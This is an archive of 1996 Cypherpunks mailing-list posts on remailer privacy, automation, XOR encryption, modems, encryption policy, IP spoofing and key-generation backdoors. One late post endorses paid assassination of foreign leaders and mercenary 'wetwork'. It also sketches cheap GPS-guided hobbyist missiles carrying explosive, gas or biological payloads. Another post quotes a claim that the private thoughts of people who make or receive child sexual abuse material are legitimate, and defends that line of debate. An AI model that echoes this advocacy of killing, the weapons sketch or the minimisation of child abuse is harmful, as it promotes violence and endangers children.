>accurate.  I'm not sure that the fact that you (or some of
>your associates) are willing to block people from getting
>anonymous mail is a sufficient safeguard.  Some may not be,
>and it only takes one or two who do not adhere to the code
>to make life miserable for the rest of us.
>
>We agree about the need for privacy, but I'm not at all sure
>why the right to send messages anonymously trumps the
>recipient's right to know who's addressing him.  Getting an
>anonymous message--even one that is not harassing or
>threatening--is an invasion of my privacy.  As for

Me:
[Please note, this statement caused me to block his address from WinSock 
messages, but _NO_ I will not give you his e-mail address, so please do not 
ask me to unless I _know_ you are a remailer-operator, and you send me a 
PGPmessage including your key and asking for it for blocking reasons ONLY. 
So far, nobody has been stupid enough to try to use the remailers to harass 
him. I DON'T want this man harassed, and having him understand "our" point 
of view will be a "big cypherpunk win"(tm) IMNSHO, so please trust me to 
represent you fairly. Thanks.]
On with the Judge:

>Halloween, it only really works when the people dressed up
>are about four feet tall.  In the rare instances where there
>have been adults at my door that were so disguised you
>couldn't tell who they were, I felt threatened--kept my
>Glock handy before opening door.
>
>The quote about morphed children's images was sort of
>botched, as was my assessment of the Third Circuit's case.
>What I said about children is that morphed images did not
>involve normal exploitation of children so it would not
>clearly fall in the unprotected category, but that there may
>be other harms I'd have to think about before deciding.
>As for the Third Circuit's opinion, I said at the outset
>they got it right in the bottom line; what I criticized was
>their use of analogies to deal with the problem.  I find
>that much thinking about the net is analogy-driven and that
>analogies are inherently imprecise and can be misleading.
>
>Anyway, thanx for bearing with me.  There's a lot of this
>stuff I have not made up my mind about and I find talking
>about it helps shape my thinking.

Folks, we have a chance to win or lose, depending on list.maturity and 
common sense. If this man is harassed, convincing him will become harder for 
me, and I will be very annoyed. If you make a coherent comment that covers 
ground that I have not already covered with him, I will forward it on to 
him. Alex Kozinski is IMO, by far, the closest thing to a libertarian that 
Reagan ever appointed, and in both messages he has mentioned having an open 
mind. Let's try not to give him a reason to close it. Thanks for trusting 
me, and thanks in advance for behaving nicely and respecting the judge's 
privacy.
JMR


Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMj3ENG1lp8bpvW01AQEOBAP+IExjfTO6DnrBvF8/xNFWLDcYTgIid5tI
Gpya0oRKRFIgYm2v3pjw2y649QxC8bGryy15wi72s6p4f1Sf6pqKbOz6ANcHNkOK
JoenVAMBxKK4wwoDIzqkxPBBIBmQO/KzJBw5ymfhGMZNN+NN6nwS9JnlSKeDwFtO
94BZLZ2fec4=
=IS+5
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Smith <smith@sctc.com>
Date: Tue, 17 Sep 1996 09:41:27 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <199609162224.RAA12536@shade.sctc.com>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard wrote:

: .... But suppose the population problem could
: be fixed. Then, with technology escalating towards singularity,
: machines doing almost all labor, there could certainly exist a
: system where the 'dumb' and 'lazy' could be fed and housed properly
: without anybody complaining.

I'm always fascinated when people trot out this notion of technology
giving us a maintenance free world that provides all our needs.  Like
Rifkin's "End of Work." I'm sorry but I just don't see how the
problems of food and shelter are solved simply because we've automated
the production of bank statements.  All the really effective
automation has involved symbolic activities, not the basic stuff of
life, like food and shelter.

: P.S.  Mac Donalds could easily be replaced by a bot.

Very unlikely. Despite the incredible degree of mechanization that
happens in food production, *most* of it requires people in the loop.
Part of it is health concerns -- you're far more likely to poison a
significant portion of the population if you don't keep active human
involvement in food production. But there's also a lot having to do
with the structure of the work. You *can't* send a robot tractor into
the fields and expect it to treat your corn right. And milking
machines, well ....

I did a lot with fault tolerance and industrial robotics in a previous
life. Robots work fine in highly structured environments. Their value
decreases dramatically as you remove structure.  In unstructured
environments they're either useless or just plain dangerous. Even the
so called "industrialized" farms are wildly unstructured compared to a
factory floor. And there's little reason to assume that 'biological
units' (plants and animals produced for food) in a fully structured
factory-like setting will yield all the products necessary for an
adequate food supply.  It seems that whenever we develop a "complete"
model of what people need to survive and subject a few people to it,
we discover that something fatal has been left out.

: But to force people into menial service jobs just to literally
: survive is not to my taste. No, give them minimal shelter for
: nothing and from there on let the market anarcho-capitalistic
: struggle begin, for obtaining a higher than minimum material
: standard or reputational standing.

I suspect that the Real World will always require a large portion of
the available labor pool to do work that supports the production of
food and shelter. The support has gotten pretty indirect in modern
industrialized countries, I admit.

Rick.
smith@sctc.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 17 Sep 1996 11:33:22 +0800
To: cypherpunks@toad.com
Subject: Flamewars and events of the outside world
Message-ID: <9609162145.AA08344@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Is there anybody who saw a correlation with the occurences of 
flamewars or nut-cases on the list with important things that 
happened in the outside world that could benefit from having the 
CPunks looking the other way?

Like this one with "Anonymous" going on.  And a few others lately.  
Some clueless or semi-outsiders seems to drop in the group and sling 
mud to detract every active participants from the other topics 
discussed (usually, more to the point with CP).  

I am not ranting about the answering, I'm simply puzzled by the 
phenomenon.  Just like, as a rule here in Canada, every time the 
country is really going down and that everybody start getting fed-up 
of the govt, suddenly the debate on death penalty or abortion or 
racial equality or salary inequality among sexes just pops-up.  Every 
times, it looks it happened purely as an happenstance but every time, 
there was something very fishy going on at another level.

Ciao

jfa
Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultant
    physicists and engineers, LabView programming
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 17 Sep 1996 04:45:47 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <199609160641.AAA23324@InfoWest.COM>
Message-ID: <199609161550.RAA12811@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


attila wrote:

> = .   There's no substantial difference between their resentful whining about
> = .their rights and your resentful whining about your rights - except maybe
> = .that you whine more.
> 
>         that is worse than a cheap shot...  like a man low enough to 
>     shoot another while he's taking a crap.

   Initially this struck me as an inane analogy, so I snipped it (with
mention) from my response; in retrospect I see just how shrewdly you
captured the scene. Pure poetry. I *was* aiming at a guy who was shitting.
;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Tue, 17 Sep 1996 11:25:09 +0800
To: cypherpunks@toad.com
Subject: Redundancy in XOR encryption
Message-ID: <842896374.27768.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I have a question I hope someone here might be able to answer:

As the method of cryptanalysis of XOR (Ie. index of coincidence) 
relies on redundancy in the plaintext, would the following be strong:

Compress P to get perfect compression (ie. 0 redundancy)
Encrypt F (the compressed text) using a repeated key XOR

of course this is all rather theoretical as there is no such thing as 
perfect compression, but I just thought it might be interesting to 
see if this is indeed strong, superficially it appears so to me...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQCVAwUBMj2TvL5OPIRbv66xAQGRpgP+LU0Y8sxzO6rObCYAQdrD8/R/iDJN3m0Z
4ZetS7jcbz7wT6bj2l7Usb0F4h/YMhxtl0y9EQ91ozg35jfRKdy2IwUoMDvqsVSZ
wKmaM/DpEt2LDyRQnzIvlNYQp6/eXQoBUb7r9SH/dZbjM7culpjzJLhd07Nx5okE
jUmPNBLm9m0=
=RHie
-----END PGP SIGNATURE-----

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Tue, 17 Sep 1996 12:18:48 +0800
To: Jay Gairson <erp@digiforest.com>
Subject: Re: 56 kbps modems
In-Reply-To: <Pine.LNX.3.91.960916162806.11964A-100000@digital.digiforest.com>
Message-ID: <Pine.3.89.9609161728.A25693-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 16 Sep 1996, Jay Gairson wrote:

> Speaking of ISDN, how many people, can afford to have a personal ISDN 
> line in there house?  And then afford to connect to something/someone 
> else on a next to permanent basis monthly?

No problem here. My ISDN bill is a small fraction of my regular phone bill.

--Lucky





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 17 Sep 1996 12:26:23 +0800
To: cypherpunks@toad.com
Subject: Re: Diffie Hellman - logs in Galois fields
Message-ID: <97BDuD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


paul@fatmans.demon.co.uk writes:

> 
> Hi all,
> 
> A question for the matematicians out there:
> 
> I am looking at the Diffie Hellman public key exchange protocol and 
> am trying to find out why it is computationally hard to take logs in 
> a finite (Galois) field.

I think polluting this mailing list with trivial questions such as this is
just as bad as polluting it with personal attacks. Read the FAQs.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Tue, 17 Sep 1996 09:46:57 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.31 - Join Rep. Eshoo Online, Tues. 9/16, 8:00 EDT
Message-ID: <v02140b07ae637e3c1a19@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
    _____ _____ _______
   / ____|  __ \__   __|   ____        ___               ____             __
  | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
  | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
  | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
   \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
   The Center for Democracy and Technology  /____/     Volume 2, Number 31
----------------------------------------------------------------------------
      A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 31                    September 16, 1996

 CONTENTS: (1) Join Rep. Anna Eshoo (D-CA) Live Online
               Tuesday Sept 17, 8:00 pm EDT
           (2) How to Subscribe/Unsubscribe
           (3) About CDT, contacting us

  ** This document may be redistributed freely with this banner intact **
        Excerpts may be re-posted with permission of <editor@cdt.org>
         ** This document looks best when viewed in COURIER font **
-----------------------------------------------------------------------------

(1) Join Rep. Anna Eshoo (D-CA) Live Online Tuesday Sept 17, 8:00 pm EDT

Representative Anna Eshoo (D-CA) will be live online on Tuesday September
17 at 8:00 pm EDT (5:00 pm PDT) to discuss her efforts bring privacy and
security to the Internet through the reform of US encryption policy.
Eshoo will also take questions from Netizens during the discussion.

Representative Eshoo, who represents the heart of California's Silicon
Valley, is a co-sponsor of HR 3011, the "Security and Freedom through
Encryption (SAFE) Act of 1996", a founding member of the Congressional
Internet Caucus, and a strong advocate for enlightened Internet policies.

Momentum in Congress for real reform of US encryption policy remains
strong. The House Judiciary Committee is scheduled to hold a hearing on HR
3011 on Wednesday September 25, 1996, and the Senate Commerce Committee is
expected to vote on the Burns/Leahy "Pro-CODE" bill (S. 1726) soon.

DETAILS ON HOW TO PARTICIPATE IN THE DISCUSSION:

 At 8:00 pm EDT (5:00 pm PDT), point your browser to:

             http://www.hotwired.com/wiredside/

To participate you will need to have RealAudio installed on your computer
(available free at http://www.realaudio.com/). You also need to
be a registered HotWired member (there is no charge for registration -
visit http://www.hotwired.com/ for details).

This forum is the 6th in a series of events organized by the Center for
Democracy and Technology and the Voters Telecommunications Watch with the
purpose of bringing the Internet Community into the debate over critical
Internet policy issues.

For further information, please visit the following sites:

* For Background on the Encryption Issue:

   The Encryption Policy Resource Page:    http://www.crypto.com/
   CDT's Encryption Policy Issues Page:    http://www.cdt.org/crypto/

* For details on Congress and the Internet:

   CDT's Congress and the Net Page   http://www.cdt.org/net_congress/
   Voters Telecommunications Watch:  http://www.vtw.org/
   HotWired's WiredSide Chat:        http://www.hotwired.com/

-----------------------------------------------------------------------

(2) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you! Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
nearly 10,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------

(3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.31                                            9/16/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Tue, 17 Sep 1996 13:13:14 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems
In-Reply-To: <Pine.LNX.3.91.960916162806.11964A-100000@digital.digiforest.com>
Message-ID: <199609170112.SAA06725@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jay Gairson <erp@digiforest.com> writes:

 > Personally, by saying that no transmission on a standard
 > phoneline can have more than 3100 baud, is a statement
 > saying that technology and science, shall never advance, to
 > a point where things are possible. If you remember right,
 > just 10 or so years ago, we stated that 2400 baud was the
 > highest possible baud, and we would never go over.

Baud denotes the number of state changes made by the modem on the
line per second.  The possible states generally form some sort of
regular pattern in frequency/phase space, with each state being
maintained long enough to reliably determine it on the other end.

Before the advent of V32 and V32.bis modems, the underlying
symbol rate was substantially lower than it is now.  Then it was
determined that it was possible to overdrive the line cards on
digital switches to equalize them over a wider range of
frequencies, without smoking them down.  The newer modems take
advantage of this kludge.

Since the underlying digital data stream is eight thousand 8-bit
u-law samples per second, there are genuine theoretical limits in
terms of symbols per second which cannot be crossed.

 > My modem, running on a standard phone line, is a 28.8
 > USRobotics modem, with the software, and hardware upgrades
 > to a 3400 baud, I get on an average day anywhere from 3500
 > to 3600 baud for send/receive.  On a bad day, I only get
 > 3100 to 3200.  SO I would say, that my phone lines, are
 > cleaner than most eh?  And Yes, I am in the US.

Don't confuse "baud" in terms of characters per second through
your modem with the low level symbol rate of the modem's analog
output into the phone line.  The "baud" you see is a function not
only of the low level symbol rate, but of framing, the V.42
compression/error correction process, and other factors.

 > Speaking of ISDN, how many people, can afford to have a
 > personal ISDN line in there house?  And then afford to
 > connect to something/someone else on a next to permanent
 > basis monthly?

The price of ISDN is a function of phone company marketing, not
the cost of providing the service.  Domestic US service is almost
entirely digital now, and moving the subscriber line interface to
the consumer end, so the digital aspects of the network may be
fully exploited, is not a conceptually expensive process.

(Yes I know the software upgrade to ESS for ISDN costs a
bundle.)

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 17 Sep 1996 09:42:02 +0800
To: cypherpunks@toad.com
Subject: Re: J'accuse!: Whitehouse and NSA vs. Panix and VTW
In-Reply-To: <2.2.32.19960916190033.010773d0@vertexgroup.com>
Message-ID: <Pine.LNX.3.95.960916183500.1004A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 16 Sep 1996, John F. Fricker wrote:

> Well IPSec provides for authentication of endpoints which would identify the
> syn attacker.
> 
> What amazes me is that routers happily pass packets with foreign IP return
> addresses. I guess there is some valid utility to being able to originate a
> connection that actually goes somewhere else for intiating a many to many
> protocol. But I can't think of any practical application that would
> necessarily be that way.
> 
> So why do routers let packets leave local networks that do not appear to
> originate from said local network? Doesn't routing work "both ways" so to speak?

Probably the same reason that most routers let packets claiming to be from the
local net through.  Even those that do filter packets claiming to be from the
local net don't have any real reason to block packets claiming to be from
foreign addresses -- the administrators don't have anything to gain.  It'll
probably take some time before this is considered standard netiquette.

- -- Mark

PGP encrypted mail prefered.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMj3WtizIPc7jvyFpAQFIaQf+LFurdJzTgysANF8KNutVkYPR/29jHHON
Vf+2SBn71AYhuBbkwAuAyCr+MyI7T0+Cct6sDq/F6FotiI8fUid2HKmcvfdSBl7l
dRdKRfeNVKrbwggx8cg+smgWlx47zmMKNYa5RO1q53xwKHUBrLjEB+FzpLXryAbJ
5fbg/0ujnqPejHDBdjeDGyebzE6FOr/2qjCpGZb9CU+2Df35VJde5sNuObLo/H1q
mM70vPMsMzSiRkSzDTtnsJZJumOqMP92Q3KSSwtOre5D7Fxg9g9anpTxYmYQhBEs
SqyKMOTluFUh1Uq+8cizqZ+zzc89cnM1+vUJKRe4TxvNxMY0JJ7CWQ==
=yYoB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Wed, 18 Sep 1996 03:52:05 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <842976189.23679.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




> tcmay@got.net (Timothy C. May) writes:
> > Crypto Anarchy means getting rid of deadwood the old-fashioned way.
> 
> Starting with the lying old fart himself.
 
The Vilus bot is at it again, I suggest a 2 line cypherpunks FAQ 
along the following lines:

Q> What do it do when I join the list?
 A> Killfile *@bwalk.dm.net


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Wed, 18 Sep 1996 05:52:47 +0800
To: cypherpunks@toad.com
Subject: CU foward post, netcopped again!
Message-ID: <842976184.23597.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> >what is  being punished here is not the exploitation of children, which is 
> > wrong and must be prevented, but the private thoughts of those who 
> > produce and recieve this material, which are totally private and 
> > legitimate. 
> 
> There is nothing "legitimate" about fucking children, fantasising about 
> fucking children, or looking at pictures of people fucking children.
> 
> The dangers of this debate are all too apparent, and if this sort of 
> quote were to reach the tabloid audience I hardly think it would be a 
> positive contribution to the image of CommUnity...

Oh no! - I`ve been netcopped on the CommUnity list *AGAIN*, long live 
cypherpunks, the last bastion of free speech on the net!!!! ;-)

But seriously, this does highlight what we are up against, when 
CommUnity (for US readers CommUnity, abreviated CU sometimes, is like 
a UK version of the EFF), supposedly a free speech and online 
liberties organisation, has posters (and this one is pretty typical) 
like this which clearly cover all debate on a subject area as 
"padophilia" if they try to explore the issues any more deeply than 
saying that fucking children is wrong...


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Tue, 17 Sep 1996 12:49:06 +0800
To: mac-crypto@thumper.vmeng.com
Subject: Re: Gaining trust in OCO crypto code
Message-ID: <ae63b0e900021004988f@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I agree with most of Bill's points. It is the right sort of analysis.

At 3:06 PM 9/12/96, Bill Frantz wrote:
....
>(2) Key generation.  There are published ways to encode an RSA secret key
>in the corresponding RSA public key.  A key generation algorithm which only
>uses 32 bits of the random number would be hard to detect, but easy to
>break by one who knew its secret.  You have to be able to examine in detail
>how keys are generated.

Actually if you generate 100,000 RSA keys with the algorithm the birthday
effect says that
you will have some collisions. Of course even 100,000 key generations takes
a long time.

....
>(1) Implementation of a cryptographic algorithm.  If we can feed it enough
>test cases, and compare the output with a public, well vetted
>implementation, we can come to believe that it is correct.

For some purposes. On the transmitting end if the enemy can choose the
plain text then a tested but bogus implementation can take special action
upon seeing a signal in the plain text stream. One such action would be to
merely shut down. On the receiving end a bogus implementation can detect a
signal inserted in the cipher text by the enemy and cause damage. I havn't
thought of any low visibility attacks but I suspect that there may be some.

If random number generation is specified not to be integral to RSA key
generation, then two or more untrusted programs, from mutually hostile
sources, can generate your RSA key if they yield the same output from the
same input. In paranoia situations I would rather trust my keyboard random
than an algorithm chosen by my enemy.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Tue, 17 Sep 1996 13:21:02 +0800
To: cypherpunks@toad.com
Subject: Assassination Politics, was Kiddie porn on the Internet
Message-ID: <v02130503ae6361b73b06@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>>Yet another obligatory AP (Assassination Politics) reference:  If a person
>>is really interested in helping out "starving children" he may be able to do
>>far more good by purchasing the death of the local tyrant(s), rather than
>>(just) buying more food.
>
>
>The problem is that assasination rarely leads to the installation of
>a government that is any better. In most cases it gets worse.
>
>In the past the US excuse for supporting bloodthirsty murderers like
>Pinochet, Saddam, Marcos and Noriega was that the alternative was
>worse.
>
>In cases like Eritrea or Ethiopia the average term of office of any
>given despot tends to be rather short in any case. In most cases its
>a case of there being little to choose between the leaders of the
>various factions and that ending the war on any terms is better
>than allowing it to continue.
>

We've all heard these arguments, but are they true?  Who says so, and how
can they be certain? Jim's suggestion has never, to my knowledge, been
tried on a consistant, large, scale.  When all conventional alternatives
have been tried and fail, what have we or the starving children got to
lose?

I'm sure there are qualified mercinaries available at the right price to
put together wetwork operations, just look in soldier of fortune.

I once had a hand in establishing a non-profit.  Perhaps we can name it
SPECTRE (SPecial Executive for Counter-intelligence, Terrorism, Revenge and
Extortion) after Ian Flemming.

Is it legal for citizens of the U.S. to engage in contract killing of
foreign military, politations, etc?  How about U.S. or foreign non-profits?

In a related matter, I used to be an avid RC modeler.  By marrying a
single-board computers, DGPS (Differential GPS) and Giant Scale Remote
Control technologies it now appears straightforward to produce inexpensive
consumer cruise missiles capable of accurate (<10 meter radius) delivery of
10 kg. explosive, gas or biological payloads over several hundred km. for
less than $10,000 each.  Both reciprocating and miniature jet engines are
available. Might make cheaper alternative to mercinaries.

-- Steve


PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 17 Sep 1996 14:13:02 +0800
To: jbugden@smtplink.alis.ca
Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant).
In-Reply-To: <9608168428.AA842894324@smtplink.alis.ca>
